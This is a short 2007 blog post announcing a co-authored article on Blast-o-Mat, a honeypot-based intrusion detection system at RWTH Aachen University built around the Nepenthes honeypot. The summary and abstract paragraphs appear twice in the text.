Advanced Honeypot-Based Intrusion Detection
Sunday, January 28. 2007
Together with Jan Göbel and Jens Hektor from the Center for Computing and Communication at RWTH Aachen University, I published an article entitled "Advanced Honeypot-Based Intrusion Detection" in the recent ;login: (Volume 31, Number 6) magazine.
The paper describes a custom network intrusion detection system called Blast-o-Mat based on different sensors, one of them being nepenthes. We describe the system and give an overview of the lessons learned, some quantitative results, and an example of a Haxdoor infection detected via the system.
A live demo of Blast-o-Mat is available at the Blast-o-mat Status page.
Abstract:
At RWTH Aachen University, with about 40,000 computer-using people to support, we have built a system to detect infected machines based on honeypots. One important building block of Blast-o-Mat is Nepenthes, which we use both to detect malware-infected systems and to collect malware. Nepenthes is a
low-interaction honeypot that appears as vulnerable software but instead decodes attack code and downloads malware. We have been successful at uncovering and quarantining infected systems with sensors listening at 0.1% of our address space. Investigation of collected malware has led to discovery of many infected systems and even a huge cache of stolen identity information.
The paper describes a custom network intrusion detection system called Blast-o-Mat based on different sensors, one of them being nepenthes. We describe the system and give an overview of the lessons learned, some quantitative results, and an example of a Haxdoor infection detected via the system.
A live demo of Blast-o-Mat is available at the Blast-o-mat Status page.
Abstract:
At RWTH Aachen University, with about 40,000 computer-using people to support, we have built a system to detect infected machines based on honeypots. One important building block of Blast-o-Mat is Nepenthes, which we use both to detect malware-infected systems and to collect malware. Nepenthes is a
low-interaction honeypot that appears as vulnerable software but instead decodes attack code and downloads malware. We have been successful at uncovering and quarantining infected systems with sensors listening at 0.1% of our address space. Investigation of collected malware has led to discovery of many infected systems and even a huge cache of stolen identity information.
".
